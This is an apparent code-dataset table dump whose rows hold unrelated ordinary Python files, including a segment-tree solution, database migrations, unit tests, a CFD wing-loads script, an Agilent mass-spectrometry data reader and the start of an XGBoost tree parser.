max_stars_repo_path
stringlengths 4
197
| max_stars_repo_name
stringlengths 6
120
| max_stars_count
int64 0
191k
| id
stringlengths 1
8
| content
stringlengths 6
964k
| score
float64 -0.88
3.95
| int_score
int64 0
4
|
---|---|---|---|---|---|---|
Segment Tree Query II.py | RijuDasgupta9116/LintCode | 321 | 25604 | <filename>Segment Tree Query II.py
"""
For an array, we can build a SegmentTree for it, each node stores an extra attribute count to denote the number of
elements in the the array which value is between interval start and end. (The array may not fully filled by elements)
Design a query method with three parameters root, start and end, find the number of elements in the in array's interval
[start, end] by the given root of value SegmentTree.
Have you met this question in a real interview? Yes
Example
For array [0, empty, 2, 3], the corresponding value Segment Tree is:
[0, 3, count=3]
/ \
[0,1,count=1] [2,3,count=2]
/ \ / \
[0,0,count=1] [1,1,count=0] [2,2,count=1], [3,3,count=1]
query(1, 1), return 0
query(1, 2), return 1
query(2, 3), return 2
query(0, 2), return 2
"""
__author__ = 'Daniel'
DEFAULT = 0
f = lambda x, y: x+y
class Solution:
def query(self, root, s, e):
"""
Segment: [s, e]
:param root: The root of segment tree
:param start: start of segment/interval
:param end: end of segment/interval
:return: The count number in the interval [start, end]
"""
if not root:
return DEFAULT
if s <= root.start and e >= root.end:
return root.count
if s > root.end or e < root.start:
return DEFAULT
l = self.query(root.left, s, e)
r = self.query(root.right, s, e)
return f(l, r)
| 3.125 | 3 |
migrations/versions/a2c88ed3a94a_.py | crossgovernmentservices/csd_notes | 0 | 25732 | """empty message
Revision ID: <PASSWORD>
Revises: None
Create Date: 2016-04-27 16:54:34.185442
"""
# revision identifiers, used by Alembic.
revision = '<PASSWORD>'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('role',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.Column('description', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id', name=op.f('pk_role')),
sa.UniqueConstraint('name', name=op.f('uq_role_name'))
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=255), nullable=True),
sa.Column('password', sa.String(), nullable=True),
sa.Column('full_name', sa.String(), nullable=True),
sa.Column('inbox_email', sa.String(length=255), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('confirmed_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id', name=op.f('pk_user')),
sa.UniqueConstraint('email', name=op.f('uq_user_email')),
sa.UniqueConstraint('inbox_email', name=op.f('uq_user_inbox_email'))
)
op.create_table('note',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('is_email', sa.Boolean(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], name=op.f('fk_note_user_id_user')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_note'))
)
op.create_table('user_roles',
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['role.id'], name=op.f('fk_user_roles_role_id_role')),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], name=op.f('fk_user_roles_user_id_user'))
)
op.create_table('note_history',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('note_id', sa.Integer(), nullable=True),
sa.Column('version', sa.Integer(), nullable=True),
sa.Column('content', sa.Text(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['note_id'], ['note.id'], name=op.f('fk_note_history_note_id_note')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_note_history'))
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('note_history')
op.drop_table('user_roles')
op.drop_table('note')
op.drop_table('user')
op.drop_table('role')
### end Alembic commands ###
| 1.203125 | 1 |
eventkit_cloud/jobs/migrations/0011_add_file_data_providers.py | venicegeo/eventkit-cloud | 1 | 25860 | # Generated by Django 3.1.2 on 2021-01-27 18:43
from django.db import migrations
class Migration(migrations.Migration):
def add_file_data_providers(apps, schema_editor):
DataProviderType = apps.get_model("jobs", "DataProviderType")
ExportFormat = apps.get_model("jobs", "ExportFormat")
# Create the DataProvider objects if they don't exist.
DataProviderType.objects.get_or_create(type_name="vector-file")
DataProviderType.objects.get_or_create(type_name="raster-file")
# Currently available Provider Types.
vector_data_provider_types = ["vector-file"]
raster_data_provider_types = ["raster-file"]
# Currently available Export Formats.
nitf = ExportFormat.objects.get(slug="nitf")
gtiff = ExportFormat.objects.get(slug="gtiff")
kml = ExportFormat.objects.get(slug="kml")
shp = ExportFormat.objects.get(slug="shp")
gpkg = ExportFormat.objects.get(slug="gpkg")
# Set the known supported export formats per provider type.
for provider_type in DataProviderType.objects.all():
if provider_type.type_name in vector_data_provider_types:
provider_type.supported_formats.add(gpkg, shp, kml)
if provider_type.type_name in raster_data_provider_types:
provider_type.supported_formats.add(gpkg, gtiff, nitf)
dependencies = [
("jobs", "0010_dataprovider_data_type"),
]
operations = [migrations.RunPython(add_file_data_providers)]
| 1.101563 | 1 |
tests/test_inchi.py | ginkgobioworks/pychemy | 3 | 25988 | <filename>tests/test_inchi.py
from __future__ import print_function
import unittest
import six
from pychemy.inchi import InChI
class InchiTest(unittest.TestCase):
def test_unicode_inchi(self):
inchi_str = six.u('InChI=1S/C14H18O8/c1-20-9-4-7(5-15)2-3-8(9)21-14-13(19)12(18)11(17)10(6-16)22-14/h2-5,10-14,16-19H,6H2,1H3/t10-,11-,12+,13-,14-/m1/s1')
inchi = InChI(inchi_str)
formula = inchi.formula
self.assertEqual(formula.formula, 'C14H18O8')
| 1.296875 | 1 |
src/tarski/fstrips/hybrid/differential_constraints.py | phoeft670/tarski | 29 | 26116 |
from ...syntax import BuiltinFunctionSymbol, CompoundTerm
from . import errors as err
class DifferentialConstraint:
""" A (possibly lifted) reaction """
def __init__(self, language, name, parameters, condition, variate, ode):
self.name = name
self.language = language
self.parameters = parameters
self.condition = condition
self.variate = variate
self.ode = ode
self._check_well_formed()
def _check_well_formed(self):
if not isinstance(self.variate, CompoundTerm):
raise err.InvalidDifferentialConstraintDefinition(self.variate, "Needs to be a compound term")
if isinstance(self.variate, BuiltinFunctionSymbol):
raise err.InvalidDifferentialConstraintDefinition(self.variate, "Cannot be a built-in function")
# ....
def ident(self):
params = ', '.join([str(o) for o in self.parameters])
return '{}({})'.format(self.name, params)
def dump(self):
return dict(name=self.name,
params=[par.dump() for par in self.parameters],
condition=self.condition.dump(),
variate=self.variate.dump(),
ode=self.ode.dump())
def __str__(self):
tokens = ['reaction {}:'.format(self.name),
'cond: ({})'.format(self.condition),
'variate: {}'.format(self.variate),
'ode: {}'.format(self.ode)]
return '\n'.join(tokens)
| 1.804688 | 2 |
app/logic/mailing/tests/tests_management_SendMail.py | imvu/bluesteel | 10 | 26244 | """ StackedMail management command tests """
from django.test import TestCase
from django.test import Client
from django.conf import settings
from django.core import mail
from django.core.management import call_command
from django.utils.six import StringIO
from app.logic.mailing.models.StackedMailModel import StackedMailEntry
from app.logic.httpcommon import res
import os
import shutil
class ManagementStackedMailTestCase(TestCase):
def setUp(self):
self.client = Client()
self.tmp_folder = os.path.join(settings.TMP_ROOT)
if not os.path.exists(self.tmp_folder):
os.makedirs(self.tmp_folder)
def tearDown(self):
if os.path.exists(self.tmp_folder):
shutil.rmtree(self.tmp_folder)
def create_stacked_email(self, sender, receiver, title, msg, sent):
StackedMailEntry.objects.create(
receiver=receiver,
sender=sender,
title=title,
content=msg,
is_sent=sent
)
def test_command_output(self):
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title1', 'Body1', True)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title2', 'Body2', False)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title3', 'Body3', False)
self.create_stacked_email('<EMAIL>', '<EMAIL>', 'Title4', 'Body4', False)
out = StringIO()
call_command('sendmail', stdout=out)
self.assertIn('', out.getvalue())
mail.outbox.sort(key=lambda x: x.to[0])
self.assertEqual('<EMAIL>', mail.outbox[0].to[0])
self.assertEqual('<EMAIL>', mail.outbox[0].from_email)
self.assertEqual('<EMAIL>', mail.outbox[1].to[0])
self.assertEqual('<EMAIL>', mail.outbox[1].from_email)
self.assertEqual('<EMAIL>', mail.outbox[2].to[0])
self.assertEqual('<EMAIL>', mail.outbox[2].from_email)
emails = StackedMailEntry.objects.all()
for email in emails:
self.assertEqual(True, email.is_sent)
| 1.960938 | 2 |
app/blog/blog_entries/migrations/0002_remove_article_for_adult.py | Risoko/DRF-Auth-With-Blog-Entries | 0 | 26372 | # Generated by Django 3.0.1 on 2020-01-08 08:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog_entries', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='article',
name='for_adult',
),
]
| 0.769531 | 1 |
cfdutils/examples/onera/onera.py | acrovato/pycfdutils | 0 | 26500 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# test encoding: à-é-è-ô-ï-€
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Onera M6 wing
# <NAME>
def inputs():
'''Inputs definition
'''
p = {}
p['File'] = 'surface_flow' # file containing the flow solution
p['Format'] = 'dat' # file format (dat = Tecplot ASCII, vtk = VTK ASCII, vtu = VTK)
p['Cuts'] = [0.01, 0.24, 0.53, 0.78, 0.96, 1.08, 1.14, 1.18] # y-coordinates of the slices
p['Tag'] = [None, None] # tag number and name if the solution is provided not only on the wing surface
p['Variable'] = 'Pressure_Coefficient' # name of variable to extract
p['AoA'] = 3.06 # angle of attack (degrees)
return p
def cLoads(p):
'''Extract several slices along the wing span and compute the sectional aerodynamic load coefficients
'''
import cfdutils.tools.vtku as vu
import cfdutils.tools.loads as lu
# Define reader
reader = vu.Reader()
reader.open(p['File'], p['Format'])
# Create slices
cutter = vu.Cutter(reader.grid)
loads = lu.Loads()
for i in range(0, len(p['Cuts'])):
cutter.cut([0., p['Cuts'][i], 0.], [0., 1., 0.], p['Tag'][0], p['Tag'][1])
pts, elems, vals = cutter.extract(2, [p['Variable']])
loads.add(p['Cuts'][i], pts, vals[p['Variable']])
# Compute loads
loads.compute(p['AoA'])
loads.display()
loads.plot()
loads.write()
def mkchdirexec(dirname, p):
'''Create a directory if it does not exist, change to it and execute
'''
import os
dir = os.path.join(os.getcwd(), dirname)
if not os.path.isdir(dir):
os.makedirs(dir)
os.chdir(dir)
p['File'] = os.path.join(os.path.split(__file__)[0], p['File']) # to get relative path to this file
cLoads(p)
os.chdir('..')
def main():
# Get inputs
p = inputs()
# Compute loads for several file formats...
# Tecplot ASCII, computed using SU2 (https://github.com/su2code/SU2/releases/tag/v7.0.6)
print('--- SU2 - surface -Tecplot ASCII ---')
p['Format'] = 'dat'
mkchdirexec('Tecplot_ASCII', p)
# VTK ASCII, computed using SU2
print('--- SU2 - surface - VTK ASCII ---')
p['Format'] = 'vtk'
mkchdirexec('VTK_ASCII', p)
# VTK binary, computed using SU2
print('--- SU2 - surface - VTK binary ---')
p['Format'] = 'vtu'
mkchdirexec('VTK_bin', p)
# VTK binary, computed using Flow v1.9.2 (https://gitlab.uliege.be/am-dept/waves/-/releases)
print('--- Flow - field - VTK binary ---')
p['File'] = 'flow'
p['Tag'] = [5, 'tag']
p['Variable'] = 'Cp'
mkchdirexec('VTK_bin2', p)
if __name__ == "__main__":
main() | 2.265625 | 2 |
src/models/exif_sc/__init__.py | lemonwaffle/nisemono | 7 | 26628 | from .exif_sc import EXIF_SC
from .networks import EXIF_Net | 0.084473 | 0 |
ms_deisotope/data_source/_vendor/AgilentD.py | mobiusklein/ms_deisotope | 18 | 26756 | <gh_stars>10-100
import os
import glob
import warnings
import logging
from collections import deque
from six import string_types as basestring
from lxml import etree
try:
log = logging.getLogger(os.path.basename(__file__))
except Exception:
log = None
from collections import OrderedDict, defaultdict
from weakref import WeakValueDictionary
try:
WindowsError
except NameError:
raise ImportError("Platform Not Supported")
try:
import comtypes
from comtypes.client import GetModule, CreateObject
except (ImportError, NameError) as e:
raise ImportError("Could not import comtypes")
import numpy as np
from ms_deisotope.data_source.common import (
ScanDataSource,
RandomAccessScanSource,
Scan,
ScanBunch,
PrecursorInformation,
ActivationInformation,
IsolationWindow,
InstrumentInformation,
ComponentGroup,
component,
FileInformation,
SourceFile,
ScanAcquisitionInformation,
ScanEventInformation,
ScanWindow)
try:
# Load previously built COM wrapper
from comtypes.gen import (
MassSpecDataReader,
BaseCommon,
BaseDataAccess)
DLL_IS_LOADED = True
except (ImportError, TypeError):
DLL_IS_LOADED = False
_default_paths = []
def _register_dll_dir(search_paths=None):
from ms_deisotope.config import get_config
if search_paths is None:
search_paths = []
global DLL_IS_LOADED
if DLL_IS_LOADED:
return True
search_paths = list(search_paths)
search_paths.extend(_default_paths)
search_paths.extend(get_config().get('vendor_readers', {}).get('agilent-com', []))
for dll_dir in search_paths:
try:
GetModule(os.path.join(dll_dir, 'MassSpecDataReader.tlb'))
GetModule(os.path.join(dll_dir, 'BaseCommon.tlb'))
GetModule(os.path.join(dll_dir, 'BaseDataAccess.tlb'))
DLL_IS_LOADED = True
return True
except Exception:
continue
else:
return False
def register_dll_dir(search_paths=None):
if search_paths is None:
search_paths = []
if isinstance(search_paths, basestring):
search_paths = [search_paths]
loaded = _register_dll_dir(search_paths)
if not loaded:
log.debug("Could not resolve Agilent-related DLL")
search_paths.extend(_default_paths)
msg = '''
1) The MassSpecDataReader, BaseCommon, BaseDataAccess DLLs/TLBs may not be installed and
therefore not registered to the COM server.
2) The MassSpecDataReader, BaseCommon, BaseDataAccess DLLs/TLBs may not be on these paths:
%s
''' % ('\n'.join(search_paths))
raise ImportError(msg)
class CaseInsensitiveDict(dict):
def __init__(self, template=None):
if isinstance(template, dict):
template = {k.lower(): v for k, v in template.items()}
dict.__init__(self, template)
def __getitem__(self, key):
key = key.lower()
return dict.__getitem__(self, key)
def __delitem__(self, key):
return super(CaseInsensitiveDict, self).__delitem__(key.lower())
def __setitem__(self, key, value):
key = key.lower()
return dict.__setitem__(self, key, value)
def __contains__(self, key):
return super(CaseInsensitiveDict, self).__contains__(key.lower())
device_to_component_group_map = CaseInsensitiveDict({
"QTOF": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
ComponentGroup("analyzer", [component("quadrupole")], 3),
ComponentGroup("analyzer", [component("time-of-flight")], 4)
],
"Quadrupole": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
],
"TandemQuadrupole": [
ComponentGroup("analyzer", [component("quadrupole")], 2),
ComponentGroup("analyzer", [component("quadrupole")], 3),
ComponentGroup("analyzer", [component("quadrupole")], 4)
],
"IonTrap": [
ComponentGroup("analyzer", [component("iontrap")], 2)
],
"TOF": [
ComponentGroup("analyzer", [component("time-of-flight")], 2)
]
})
polarity_map = {
1: -1,
0: 1,
3: 0,
2: None
}
ion_mode_map = {
0: 'Unspecified',
1: 'Mixed',
2: 'EI',
4: 'CI',
8: 'Maldi',
16: 'Appi',
32: 'Apci',
64: 'ESI',
128: 'NanoEsi',
512: 'MsChip',
1024: 'ICP',
2048: 'Jetstream'
}
ionization_map = CaseInsensitiveDict({
"EI": component("electron ionization"),
"CI": component("chemical ionization"),
"ESI": component("electrospray ionization"),
"NanoEsi": component("nanoelectrospray"),
"Appi": component('atmospheric pressure photoionization'),
"Apci": component("atmospheric pressure chemical ionization"),
"Maldi": component("matrix assisted laser desorption ionization"),
"MsChip": component("nanoelectrospray"),
"ICP": component("plasma desorption ionization"),
"Jetstream": component("nanoelectrospray")
})
inlet_map = CaseInsensitiveDict({
"EI": component("direct inlet"),
"CI": component("direct inlet"),
"Maldi": component("particle beam"),
"Appi": component("direct inlet"),
"Apci": component("direct inlet"),
"Esi": component("electrospray inlet"),
"NanoEsi": component("nanospray inlet"),
"MsChip": component("nanospray inlet"),
"ICP": component("component(inductively coupled plasma"),
"JetStream": component("nanospray inlet"),
})
peak_mode_map = {
'profile': 0,
'centroid': 1,
'profilepreferred': 2,
'centroidpreferred': 3
}
device_type_map = {
0: 'Unknown',
1: 'Mixed',
2: 'Quadrupole',
3: 'IsocraticPump',
4: 'TOF',
5: 'TandemQuadrupole',
6: 'QTOF',
10: 'FlourescenceDetector',
11: 'ThermalConductivityDetector',
12: 'RefractiveIndexDetector',
13: 'MultiWavelengthDetector',
14: 'ElectronCaptureDetector',
15: 'VariableWavelengthDetector',
16: 'AnalogDigitalConverter',
17: 'EvaporativeLightScatteringDetector',
18: 'GCDetector',
19: 'FlameIonizationDetector',
20: 'ALS',
21: 'WellPlateSampler',
22: 'MicroWellPlateSampler',
23: 'DiodeArrayDetector',
31: 'CANValves',
32: 'QuaternaryPump',
33: 'ChipCube',
34: 'Nanopump',
40: 'ThermostattedColumnCompartment',
41: 'CTC',
42: 'CapillaryPump',
50: 'IonTrap'
}
scan_type_map = CaseInsensitiveDict({
"Unspecified": 0,
"All": 7951,
"AllMS": 15,
"AllMSN": 7936,
"Scan": 1,
"SelectedIon": 2,
"HighResolutionScan": 4,
"TotalIon": 8,
"MultipleReaction": 256,
"ProductIon": 512,
"PrecursorIon": 1024,
"NeutralLoss": 2048,
"NeutralGain": 4096
})
PEAK_MODE = 0
def make_scan_id_string(scan_id):
return "scanId=%s" % (scan_id,)
class AgilentDScanPtr(object):
def __init__(self, index):
self.index = index
def __repr__(self):
return "AgilentDScanPtr(%d)" % (self.index,)
class AgilentDDataInterface(ScanDataSource):
def _get_spectrum_obj(self, scan, peak_mode=PEAK_MODE):
index = scan.index
spectrum = self.source.GetSpectrum_8(rowNumber=index, storageType=peak_mode)
return spectrum
def _get_scan_record(self, scan):
index = scan.index
record = self.source.GetScanRecord(index)
return record
def _scan_index(self, scan):
return scan.index
def _scan_id(self, scan):
record = self._get_scan_record(scan)
return make_scan_id_string(record.ScanId)
def _scan_title(self, scan):
return self._scan_id(scan)
def _scan_arrays(self, scan):
spectrum = self._get_spectrum_obj(scan)
return (np.array(spectrum.XArray, dtype=float),
np.array(spectrum.YArray, dtype=float))
def _polarity(self, scan):
record = self._get_scan_record(scan)
polarity_enum = record.IonPolarity
polarity = polarity_map.get(polarity_enum)
if polarity in (0, None):
warnings.warn("Unknown Scan Polarity: %r" % (polarity,))
return polarity
def _scan_time(self, scan):
record = self._get_scan_record(scan)
return record.retentionTime
def _is_profile(self, scan):
spectrum_obj = self._get_spectrum_obj(scan)
mode = spectrum_obj.MSStorageMode
return mode in (0, 2, 3)
def _ms_level(self, scan):
record = self._get_scan_record(scan)
return record.MSLevel
def _precursor_information(self, scan):
if self._ms_level(scan) < 2:
return None
spectrum_obj = self._get_spectrum_obj(scan)
precursor_scan_id = make_scan_id_string(spectrum_obj.ParentScanId)
n, ions = spectrum_obj.GetPrecursorIon()
if n < 1:
return None
mz = ions[0]
charge, _ = spectrum_obj.GetPrecursorCharge()
intensity, _ = spectrum_obj.GetPrecursorIntensity()
return PrecursorInformation(mz, intensity, charge, precursor_scan_id, self)
def _acquisition_information(self, scan):
spectrum_obj = self._get_spectrum_obj(scan)
try:
low = spectrum_obj.MeasuredMassRange.Start
high = spectrum_obj.MeasuredMassRange.End
except Exception:
arrays = self._scan_arrays(scan)
mz_array = arrays[0]
if len(mz_array) != 0:
low = mz_array.min()
high = mz_array.max()
else:
low = high = 0
window = ScanWindow(low, high)
event = ScanEventInformation(
self._scan_time(scan),
window_list=[window])
return ScanAcquisitionInformation("no combination", [event])
def _activation(self, scan):
record = self._get_scan_record(scan)
return ActivationInformation('cid', record.CollisionEnergy)
def _isolation_window(self, scan):
if self._ms_level(scan) < 2:
return None
spectrum_obj = self._get_spectrum_obj(scan)
n, ions = spectrum_obj.GetPrecursorIon()
if n < 1:
return None
return IsolationWindow(0, ions[0], 0)
def _instrument_configuration(self, scan):
return self._instrument_config[1]
class _AgilentDDirectory(object):
@staticmethod
def create_com_object():
if not DLL_IS_LOADED:
raise WindowsError("Could not locate Agilent DLLs")
reader = CreateObject('Agilent.MassSpectrometry.DataAnalysis.MassSpecDataReader')
return reader
@staticmethod
def create_com_object_filter():
if not DLL_IS_LOADED:
raise WindowsError("Could not locate Agilent DLLs")
no_filter = CreateObject('Agilent.MassSpectrometry.DataAnalysis.MsdrPeakFilter')
return no_filter
@staticmethod
def is_valid(path):
if os.path.exists(path):
if os.path.isdir(path):
return os.path.exists(os.path.join(path, "AcqData", "Contents.xml"))
return False
class _AgilentMethod(object):
def __init__(self, method_parameters):
self.parameters = list(method_parameters)
def __getitem__(self, i):
return self.parameters[i]
def __len__(self):
return len(self.parameters)
def __iter__(self):
return iter(self.parameters)
def __repr__(self):
return "_AgilentMethod(%d)" % (len(self),)
def search_by_name(self, name):
for param in self:
try:
if param['Name'].lower() == name.lower():
return param
except (AttributeError, KeyError):
continue
class _AgilentDMetadataLoader(object):
def _has_ms1_scans(self):
return bool(self._scan_types_flags & scan_type_map['Scan'])
def _has_msn_scans(self):
return bool(self._scan_types_flags & scan_type_map['ProductIon'])
def has_msn_scans(self):
return self._has_msn_scans()
def has_ms1_scans(self):
return self._has_ms1_scans()
def file_description(self):
fi = FileInformation(contents={}, source_files=[])
if self._has_ms1_scans():
fi.add_content("MS1 spectrum")
if self._has_msn_scans():
fi.add_content("MSn spectrum")
basename = os.path.basename
dirname = os.path.dirname
file_queue = deque()
file_queue.extend(glob.glob(os.path.join(self.dirpath, "AcqData", "*")))
# for source_file in file_queue:
while file_queue:
source_file = file_queue.popleft()
if os.path.isdir(source_file):
file_queue.extendleft(glob.glob(os.path.join(source_file, "*")))
else:
sf = SourceFile(
basename(source_file), dirname(source_file),
None, *("Agilent MassHunter nativeID format", "Agilent MassHunter format"))
sf.add_checksum("sha1")
fi.add_file(sf, check=False)
return fi
def _get_instrument_info(self):
ion_modes_flags = self.source.MSScanFileInformation.IonModes
ionization = []
for bit, label in ion_mode_map.items():
if ion_modes_flags & bit:
ionization.append(label)
configs = []
i = 1
for ionizer in ionization:
groups = [ComponentGroup("source", [ionization_map[ionizer], inlet_map[ionizer]], 1)]
groups.extend(device_to_component_group_map[self.device])
config = InstrumentInformation(i, groups)
i += 1
configs.append(config)
self._instrument_config = {
c.id: c for c in configs
}
return configs
def instrument_configuration(self):
return sorted(self._instrument_config.values(), key=lambda x: x.id)
def data_processing(self):
return []
def _acquisition_method_xml_path(self):
return os.path.join(self.dirpath, "AcqData", "AcqMethod.xml")
def _parse_method_xml(self):
try:
path = self._acquisition_method_xml_path()
tree = etree.parse(path)
nsmap = {"ns": "http://tempuri.org/DataFileReport.xsd"}
elt = tree.find(".//ns:SCICDevicesXml", namespaces=nsmap)
method_xml = etree.fromstring(elt.text)
except (IOError, OSError, ValueError, TypeError) as e:
print(e)
self._method = []
return self._method
method = list()
for section in method_xml.iterfind(".//SectionInfo"):
section_dict = {}
for child in section:
name = child.tag
value = child.text
section_dict[name] = value
method.append(section_dict)
method = _AgilentMethod(method)
self._method = method
return method
_ADM = _AgilentDMetadataLoader
_ADD = _AgilentDDirectory
class AgilentDLoader(AgilentDDataInterface, _ADD, RandomAccessScanSource, _ADM):
def __init__(self, dirpath, **kwargs):
self.dirpath = dirpath
self.dirpath = os.path.abspath(self.dirpath)
self.dirpath = os.path.normpath(self.dirpath)
self.source = self.create_com_object()
self.filter = self.create_com_object_filter()
try:
self.source.OpenDataFile(self.dirpath)
except comtypes.COMError as err:
raise IOError(str(err))
self._TIC = self.source.GetTIC()
self.device = self._TIC.DeviceName
self._n_spectra = self._TIC.TotalDataPoints
self._scan_types_flags = self.source.MSScanFileInformation.ScanTypes
self._producer = self._scan_group_iterator()
self.initialize_scan_cache()
self._index = self._pack_index()
self._get_instrument_info()
def __reduce__(self):
return self.__class__, (self.dirpath,)
@property
def index(self):
return self._index
def __len__(self):
return len(self.index)
def __repr__(self):
return "AgilentDLoader(%r)" % (self.dirpath)
def reset(self):
self.make_iterator(None)
self.initialize_scan_cache()
def close(self):
# seems to make attempting to re-open the same datafile cause a segfault
# self.source.CloseDataFile()
self._dispose()
def _pack_index(self):
index = OrderedDict()
for sn in range(self._n_spectra):
rec = self._get_scan_record(AgilentDScanPtr(sn))
index[make_scan_id_string(rec.ScanId)] = sn
return index
def _make_pointer_iterator(self, start_index=None, start_time=None):
iterator = self._make_scan_index_producer(start_index, start_time)
for i in iterator:
yield AgilentDScanPtr(i)
def _make_default_iterator(self):
return self._make_pointer_iterator()
def _make_scan_index_producer(self, start_index=None, start_time=None):
if start_index is not None:
return range(start_index, self._n_spectra)
elif start_time is not None:
start_index = self._source.ScanNumFromRT(start_time)
while start_index != 0:
scan = self.get_scan_by_index(start_index)
if scan.ms_level > 1:
start_index -= 1
else:
break
return range(start_index, self._n_spectra)
else:
return range(0, self._n_spectra)
def get_scan_by_id(self, scan_id):
"""Retrieve the scan object for the specified scan id.
If the scan object is still bound and in memory somewhere,
a reference to that same object will be returned. Otherwise,
a new object will be created.
Parameters
----------
scan_id : str
The unique scan id value to be retrieved
Returns
-------
Scan
"""
index = self._index[scan_id]
return self.get_scan_by_index(index)
def get_scan_by_index(self, index):
"""Retrieve the scan object for the specified scan index.
This internally calls :meth:`get_scan_by_id` which will
use its cache.
Parameters
----------
index: int
The index to get the scan for
Returns
-------
Scan
"""
scan_number = int(index)
try:
return self._scan_cache[scan_number]
except KeyError:
package = AgilentDScanPtr(scan_number)
scan = Scan(package, self)
self._cache_scan(scan)
return scan
def get_scan_by_time(self, time):
time_array = self._TIC.XArray
lo = 0
hi = self._n_spectra
if time == float('inf'):
return self.get_scan_by_index(len(self) - 1)
best_match = None
best_error = float('inf')
while hi != lo:
mid = (hi + lo) // 2
scan_time = time_array[mid]
err = abs(scan_time - time)
if err < best_error:
best_error = err
best_match = mid
if scan_time == time:
return self.get_scan_by_index(mid)
elif (hi - lo) == 1:
return self.get_scan_by_index(best_match)
elif scan_time > time:
hi = mid
else:
lo = mid
def start_from_scan(self, scan_id=None, rt=None, index=None, require_ms1=True, grouped=True):
'''Reconstruct an iterator which will start from the scan matching one of ``scan_id``,
``rt``, or ``index``. Only one may be provided.
After invoking this method, the iterator this object wraps will be changed to begin
yielding scan bunchs (or single scans if ``grouped`` is ``False``).
Arguments
---------
scan_id: str, optional
Start from the scan with the specified id.
rt: float, optional
Start from the scan nearest to specified time (in minutes) in the run. If no
exact match is found, the nearest scan time will be found, rounded up.
index: int, optional
Start from the scan with the specified index.
require_ms1: bool, optional
Whether the iterator must start from an MS1 scan. True by default.
grouped: bool, optional
whether the iterator should yield scan bunches or single scans. True by default.
'''
if scan_id is not None:
scan_number = self.get_scan_by_id(scan_id).index
elif index is not None:
scan_number = int(index)
elif rt is not None:
scan_number = self.get_scan_by_time(rt).index
if require_ms1:
start_index = scan_number
while start_index != 0:
scan = self.get_scan_by_index(start_index)
if scan.ms_level > 1:
start_index -= 1
else:
break
scan_number = start_index
iterator = self._make_scan_index_producer(start_index=scan_number)
if grouped:
self._producer = self._scan_group_iterator(iterator)
else:
self._producer = self._single_scan_iterator(iterator)
return self
def _make_cache_key(self, scan):
return scan._data.index
def _single_scan_iterator(self, iterator=None, mode=None):
if iterator is None:
iterator = self._make_scan_index_producer()
for ix in iterator:
packed = self.get_scan_by_index(ix)
self._cache_scan(packed)
yield packed
def _scan_group_iterator(self, iterator=None, mode=None):
if iterator is None:
iterator = self._make_scan_index_producer()
precursor_scan = None
product_scans = []
current_level = 1
for ix in iterator:
packed = self.get_scan_by_index(ix)
self._cache_scan(packed)
if packed.ms_level > 1:
# inceasing ms level
if current_level < packed.ms_level:
current_level = packed.ms_level
# decreasing ms level
elif current_level > packed.ms_level:
current_level = packed.ms_level
product_scans.append(packed)
elif packed.ms_level == 1:
if current_level > 1 and precursor_scan is not None:
precursor_scan.product_scans = list(product_scans)
yield ScanBunch(precursor_scan, product_scans)
else:
if precursor_scan is not None:
precursor_scan.product_scans = list(product_scans)
yield ScanBunch(precursor_scan, product_scans)
precursor_scan = packed
product_scans = []
else:
raise Exception("This object is not able to handle MS levels higher than 2")
if precursor_scan is not None:
yield ScanBunch(precursor_scan, product_scans)
def next(self):
return next(self._producer)
| 0.980469 | 1 |
tests/utils.py | amatissart/idunn | 0 | 26884 | <gh_stars>0
from contextlib import contextmanager
from copy import deepcopy
from app import settings
@contextmanager
def override_settings(overrides):
"""
A utility function used by some fixtures to override settings
"""
old_settings = deepcopy(settings._settings)
settings._settings.update(overrides)
try:
yield
finally:
settings._settings = old_settings
| 1.148438 | 1 |
bdt2cpp/XGBoostParser.py | bixel/bdt2cpp | 3 | 27012 | import re
from .Node import Node
class XGBoostNode(Node):
FLOAT_REGEX = '[+-]?\d+(\.\d+)?([eE][+-]?\d+)?'
BRANCH_REGEX = re.compile(f'(?P<branch>\d+):\[(?P<feature>\w+)(?P<comp><)(?P<value>{FLOAT_REGEX})\]')
LEAF_REGEX = re.compile(f'(?P<leaf>\d+):leaf=(?P<value>{FLOAT_REGEX})')
FEATURE_REGEX = re.compile('\w(?P<id>\d+)')
def __init__(self, parent=None, line='', feature_index_dict=None):
super().__init__(parent=parent)
# propagate any feature index dict
self.feature_index_dict = None
if feature_index_dict or parent:
self.feature_index_dict = feature_index_dict or parent.feature_index_dict
